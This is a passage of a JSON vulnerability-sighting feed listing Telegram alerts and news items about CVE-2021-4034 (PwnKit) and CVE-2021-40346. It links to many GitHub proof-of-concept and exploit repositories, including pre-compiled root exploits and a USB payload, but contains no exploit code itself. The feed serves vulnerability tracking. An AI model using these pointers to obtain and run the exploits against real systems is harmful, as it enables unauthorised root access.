"GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-4034 POC and Docker and Analysis write up\nURL\uff1ahttps://github.com/chenaotian/CVE-2021-4034", "creation_timestamp": "2022-01-26T11:00:42.000000Z"}, {"uuid": "c8ea6ca5-43b6-405e-8840-99a4e127e0fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1410", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPolkit pkexec CVE-2021-4034 Proof Of Concept\nURL\uff1ahttps://github.com/nobelh/CVE-2020-4034", "creation_timestamp": "2022-01-26T20:35:10.000000Z"}, {"uuid": "a3c3a353-8af0-44e8-b2fc-6e4ffa2ecc20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1397", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aJust a sh script file to CVE-2021-4034 \nURL\uff1ahttps://github.com/N1et/CVE-2021-4034", "creation_timestamp": "2022-01-26T09:51:44.000000Z"}, {"uuid": "168fa16c-03eb-4203-8a70-386b999373e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1396", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA python3 PoC for CVE-2021-4034 by Kim Schulz\nURL\uff1ahttps://github.com/kimusan/pkwner", "creation_timestamp": "2022-01-26T09:13:04.000000Z"}, {"uuid": "dd663c4b-90ca-4d8c-beb2-5f90191f03b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1395", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA Golang implementation of clubby789's implementation of CVE-2021-4034\nURL\uff1ahttps://github.com/An00bRektn/CVE-2021-4034", "creation_timestamp": "2022-01-26T05:16:47.000000Z"}, {"uuid": "fdd80888-0ab7-4d45-8dda-0c259b438225", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1429", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSingle shell script to download and make berdav CVE-2021-4034 polkit exploit and see if your system is affected\nURL\uff1ahttps://github.com/10100programer/CVE-2021-4034-Quick-Check", "creation_timestamp": "2022-01-27T19:41:06.000000Z"}, {"uuid": "e44c48ff-ad80-438d-8a51-faf1df3fd7d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1441", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-4034 Add Root User - Pkexec Local Privilege Escalation\nURL\uff1ahttps://github.com/Rvn0xsy/CVE-2021-4034", "creation_timestamp": "2022-01-28T15:36:34.000000Z"}, {"uuid": "5ed60344-454f-4cd7-b504-5972e0e8c766", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1416", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPOC for CVE-2021-4034\nURL\uff1ahttps://github.com/callrbx/pkexec-lpe-poc", "creation_timestamp": "2022-01-27T03:46:27.000000Z"}, {"uuid": "00a2afa4-1267-40e7-be5c-3a30663e54c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1414", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLocal Privilege Escalation in polkit's pkexec (CVE-2021-4034)\nURL\uff1ahttps://github.com/Al1ex/CVE-2021-4034", "creation_timestamp": "2022-01-27T02:30:03.000000Z"}, {"uuid": "27703096-3209-448e-8f35-e34b5e4d3131", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1419", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aThis repository contains the exploit for vulnerability CVE-2021-4034 .\nURL\uff1ahttps://github.com/ashutoshrohilla/CVE-2021-4034", "creation_timestamp": "2022-01-27T07:41:26.000000Z"}, {"uuid": "c7dc4ab9-078a-4cb7-835c-e230eab590be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1428", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExploit for pkexec (CVE-2021-4034) \nURL\uff1ahttps://github.com/Fato07/Pwnkit-exploit", "creation_timestamp": "2022-01-27T18:14:54.000000Z"}, {"uuid": "27ba53a5-3283-414e-9021-c2bbd98d6c4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1454", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-4034\nURL\uff1ahttps://github.com/xuntitled/Polkit-pkexec-exploit-for-Linux", "creation_timestamp": "2022-01-31T08:45:40.000000Z"}, {"uuid": "9bf2c1ac-6770-49ba-8f4e-d9876f637fcd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1453", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aGo implementation of the PwnKit Linux Local Privilege Escalation exploit (CVE-2021-4034)\nURL\uff1ahttps://github.com/OXDBXKXO/go-PwnKit", "creation_timestamp": "2022-01-30T16:10:30.000000Z"}, {"uuid": "c2450b5b-6abc-42aa-8ffe-b5a2af52a6b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1443", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCheck CVE-2021-4034 vulnerability\nURL\uff1ahttps://github.com/codiobert/pwnkit-scanner", "creation_timestamp": "2022-01-29T09:30:36.000000Z"}, {"uuid": "54d48695-91be-48d6-887f-f52d17f05acb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1427", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPre-compiled builds for CVE-2021-4034\nURL\uff1ahttps://github.com/c3c/CVE-2021-4034", "creation_timestamp": "2022-01-27T18:01:53.000000Z"}, {"uuid": "ab32b52a-0bd1-44f9-84f1-d90cbfd90e90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1442", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1acentos 6.10\u7684rpm\u5305\uff0c\u4fee\u590dCVE-2021-4034 \u6f0f\u6d1e\nURL\uff1ahttps://github.com/sofire/polkit-0.96-CVE-2021-4034", "creation_timestamp": "2022-01-29T07:00:11.000000Z"}, {"uuid": "78c0d180-7e04-48b0-a086-52a43d518bb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1450", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPwnKit PoC for Polkit pkexec CVE-2021-4034 \nURL\uff1ahttps://github.com/navisec/CVE-2021-4034-PwnKit", "creation_timestamp": "2022-01-30T04:52:52.000000Z"}, {"uuid": "b45762f4-8ae7-4cc0-a5ca-76cbd410db98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1447", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPkexec Local Privilege Escalation Exploite CVE-2021-4034 \nURL\uff1ahttps://github.com/OxWeb4/CVE-2021-4034-", "creation_timestamp": "2022-01-29T22:30:26.000000Z"}, {"uuid": "e64046cc-4154-40cf-b041-0447d9ca6110", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/ckuRED/89", "content": "Zero-Day: A vulnerability in Polkit's pkexec component identified as CVE-2021-4034 (PwnKit) is present in the default configuration of all major Linux distributions and can be exploited to gain full root privileges on the system, researchers warn today.\n\nhttps://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034\n\nhttps://www.bleepingcomputer.com/news/security/linux-system-service-bug-gives-root-on-all-major-distros-exploit-released/", "creation_timestamp": "2022-01-26T16:49:54.000000Z"}, {"uuid": "22eb6098-f6c1-4cfb-a6b6-bde2ce030ea2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-40346", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1381", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-40346 - HaProxy HTTP request smuggling through integer overflow\nURL\uff1ahttps://github.com/alexOarga/CVE-2021-40346", "creation_timestamp": "2022-01-24T22:21:35.000000Z"}, {"uuid": "3389cb94-c62a-4e50-92b4-8eb09f8217e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1390", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPoC for CVE-2021-4034 dubbed pwnkit\nURL\uff1ahttps://github.com/dzonerzy/poc-cve-2021-4034", "creation_timestamp": "2022-01-26T01:36:51.000000Z"}, {"uuid": "459ee4e8-f9a6-44fc-aa11-fd05880f97be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1388", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-4034 1day\nURL\uff1ahttps://github.com/berdav/CVE-2021-4034", "creation_timestamp": "2022-01-26T00:02:43.000000Z"}, {"uuid": "b0ce0cd1-99dd-4360-8414-02608aa850dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1446", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPwnKit - Local Privilege Escalation Vulnerability Discovered in polkit\u2019s pkexec (CVE-2021-4034)\nURL\uff1ahttps://github.com/TW-D/PwnKit-Vulnerability_CVE-2021-4034", "creation_timestamp": "2022-01-29T20:03:10.000000Z"}, {"uuid": "b0bf16fb-e808-46ac-953a-6d79e8e5c5ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1452", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1apwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034)\nURL\uff1ahttps://github.com/Almorabea/pkexec-exploit", "creation_timestamp": "2022-01-30T10:36:59.000000Z"}, {"uuid": "b1589035-cbc9-41ad-bf44-e443a9ab20be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1473", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aDawnKit is Privilege Escalation USB-Rubber-Ducky payload, which exploits CVE-2021-4034 in less than 10sec's and spawns root shell for you.\nURL\uff1ahttps://github.com/drapl0n/dawnKit", "creation_timestamp": "2022-02-04T07:06:04.000000Z"}, {"uuid": "8f14693e-46e0-418b-9fab-bdf789c5014a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "Telegram/odXP70O3XMrsEr_YmSXQAQZz7juWUhV3_6vOOLvsMkf7Bzs", "content": "", "creation_timestamp": "2025-10-03T15:00:07.000000Z"}, {"uuid": "72fb39eb-558e-423d-81a9-7d014a934361", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/5879", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1a\u63d0\u6743\n\u63cf\u8ff0\uff1aPolkit\u63d0\u6743\u5305 CVE-2021-4034 \uff08\u4f9b\u9700\u8981\u7684\u4eba\u65b9\u4fbf\u4f7f\u7528\nURL\uff1ahttps://github.com/Part01-Pai/Polkit-Permission-promotion-compiled\n\n\u6807\u7b7e\uff1a#\u63d0\u6743", "creation_timestamp": "2023-11-20T04:09:21.000000Z"}, {"uuid": "69b47130-b052-429f-8dac-f900ef151fdb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-40346", "type": "published-proof-of-concept", "source": "https://t.me/ptswarm/69", "content": "Critical Vulnerability in HAProxy (CVE-2021-40346): Integer Overflow Enables HTTP Smuggling\n\ud83d\udc64 by Ori Hollander and Or Peles\n\nThe vulnerability,\u00a0CVE-2021-40346, is an Integer Overflow, triggerable via the Content-Length HTTP header, that makes it possible to conduct HTTP Request Smuggling attacks.\n\n\ud83d\udcdd Contents:\n\u2022 Technical Background\n \u2022 HTTP Request Smuggling\n \u2022 HAProxy\u2019s HTTP request processing phases (simplified)\n\u2022 Attack Scenario \u2013 Bypassing http-request ACLs\n \u2022 What happens inside HAProxy\n \u2022 Getting the HTTP response for the smuggled request\n \u2022 Attack demonstration \u2013 ACL bypass\n\u2022 Vulnerability Details\n\u2022 Automating the Discovery\n\u2022 Fixes and Workarounds\n\nhttps://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/", "creation_timestamp": "2021-09-09T06:20:46.000000Z"}, {"uuid": "5eb13519-4615-4e96-8753-f9137eaa1603", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/noobhackersyoutube/1669", "content": "CVE-2022-0185 Container Escape PoC: \n\nhttps://github.com/Crusaders-of-Rust/CVE-2022-0185\n\nCVE-2021-4034 Privilege Escalation polkit pkexec PoC:\n\nhttps://github.com/berdav/CVE-2021-4034\n\n#git #exploit", "creation_timestamp": "2022-01-28T16:39:22.000000Z"}, {"uuid": "44de9369-fad1-42ca-b696-fea1d587dd8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/noobhackersyoutube/1661", "content": "Pwnkit: Linux Local Privilege Escalation POC - Polkit Pkexec (CVE-2021-4034)\n\nAnother local privilege escalation comes out that affects most Linux distros out there. This CVE came out last year and the POC and update just got released today.\n\nhttps://twitter.com/xtremepentest/status/1486610996080914432?s=20", "creation_timestamp": "2022-01-27T08:39:36.000000Z"}, {"uuid": "b4bac424-c6c3-448c-b888-4541b36b3878", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://t.me/itsec_news/1398", "content": "\u200b\u26a1\ufe0f \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0448\u0442\u0430\u043c\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0434\u043b\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0438 IoT-\u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u043d\u0430 Linux.\n\n\ud83d\udcac \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0438\u0437 AT&T Alien Labs \u0432\u044b\u044f\u0432\u0438\u043b\u0438 \u043d\u043e\u0432\u043e\u0435 \u0441\u043a\u0440\u044b\u0442\u043d\u043e\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c Shikitega. \u041e\u043d\u043e \u0437\u0430\u0440\u0430\u0436\u0430\u0435\u0442 \u043a\u0430\u043a \u0441\u0435\u0440\u0432\u0435\u0440\u044b, \u0442\u0430\u043a \u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430 \u0432\u0435\u0449\u0435\u0439 \u043d\u0430 Linux., \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u043c\u043d\u043e\u0433\u043e\u0441\u0442\u0443\u043f\u0435\u043d\u0447\u0430\u0442\u0443\u044e \u0441\u0445\u0435\u043c\u0443 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u0438 \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u043f\u043e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0441\u043e\u0442\u0435\u043d \u0431\u0430\u0439\u0442\u043e\u0432 \u0437\u0430 \u0448\u0430\u0433, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043a\u0440\u0438\u043f\u0442\u043e\u0440 Shikata Ga Nai. \n\n\u042d\u0442\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u0435\u0442 \u043f\u043e\u043b\u0438\u043c\u043e\u0440\u0444\u0438\u0437\u043c, \u0437\u0430\u0449\u0438\u0449\u0430\u044f \u043a\u043e\u0434 \u043e\u0442 \u0441\u0442\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 \u0441\u0438\u0433\u043d\u0430\u0442\u0443\u0440. Shikitega \u0438\u0437\u043c\u0435\u043d\u044f\u0435\u0442 \u0441\u0432\u043e\u0439 \u043a\u043e\u0434 \u043a\u0430\u0436\u0434\u044b\u0439 \u0440\u0430\u0437, \u043a\u043e\u0433\u0434\u0430 \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u0442 \u043e\u0434\u0438\u043d \u0438\u0437 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0446\u0438\u043a\u043b\u043e\u0432 \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f. \u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0431\u044d\u043a\u0434\u043e\u0440\u0430 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0435\u0442\u0441\u044f Mettle \u043a\u0430\u043a \u043e\u0431\u043b\u0435\u0433\u0447\u0435\u043d\u043d\u044b\u0439 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 Meterpreter, \u0441 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0435\u0439 CVE-2021-4034 \u0438 CVE-2021-3493. \u0418\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0444\u0430\u0439\u043b \u0432\u0438\u0440\u0443\u0441\u0430 \u0432\u0435\u0441\u0438\u0442 376 \u0431\u0430\u0439\u0442.\n\n\u0426\u0435\u043b\u044c Shikitega \u2014 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440\u0430, \u043d\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434 \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0438 \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438. \u041f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u0441\u0431\u0440\u0430\u0441\u044b\u0432\u0430\u0435\u0442 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0435 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u0435 XMRig \u0434\u043b\u044f \u0434\u043e\u0431\u044b\u0447\u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u044b Monero. \u041f\u0430\u043a\u0435\u0442 Mettle \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0432\u0435\u0431-\u043a\u0430\u043c\u0435\u0440\u043e\u0439, \u043a\u0440\u0430\u0441\u0442\u044c \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0438 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 \u0431\u043e\u043b\u044c\u0448\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432. \n\nAT&T \u043d\u0435 \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0430, \u043a\u0430\u043a \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0435 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u0435, \u043d\u043e \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0430, \u0447\u0442\u043e Shikitega \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0434\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Linux, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u0432 2021 \u0433\u043e\u0434\u0443.\n\n\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441 \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u043e\u0431\u043b\u0430\u0447\u043d\u043e\u0433\u043e \u0445\u043e\u0441\u0442\u0438\u043d\u0433\u0430 \u0434\u043b\u044f \u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0447\u0430\u0441\u0442\u0438 \u0441\u0432\u043e\u0435\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438, \u0441\u0432\u044f\u0437\u044b\u0432\u0430\u044f\u0441\u044c \u043f\u043e IP-\u0430\u0434\u0440\u0435\u0441\u0443 \u0432\u043c\u0435\u0441\u0442\u043e \u0434\u043e\u043c\u0435\u043d\u043d\u043e\u0433\u043e \u0438\u043c\u0435\u043d\u0438. \n\n\u0412 \u043c\u0430\u0440\u0442\u0435 2021 \u0433\u043e\u0434\u0430 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442 \u043f\u043e \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 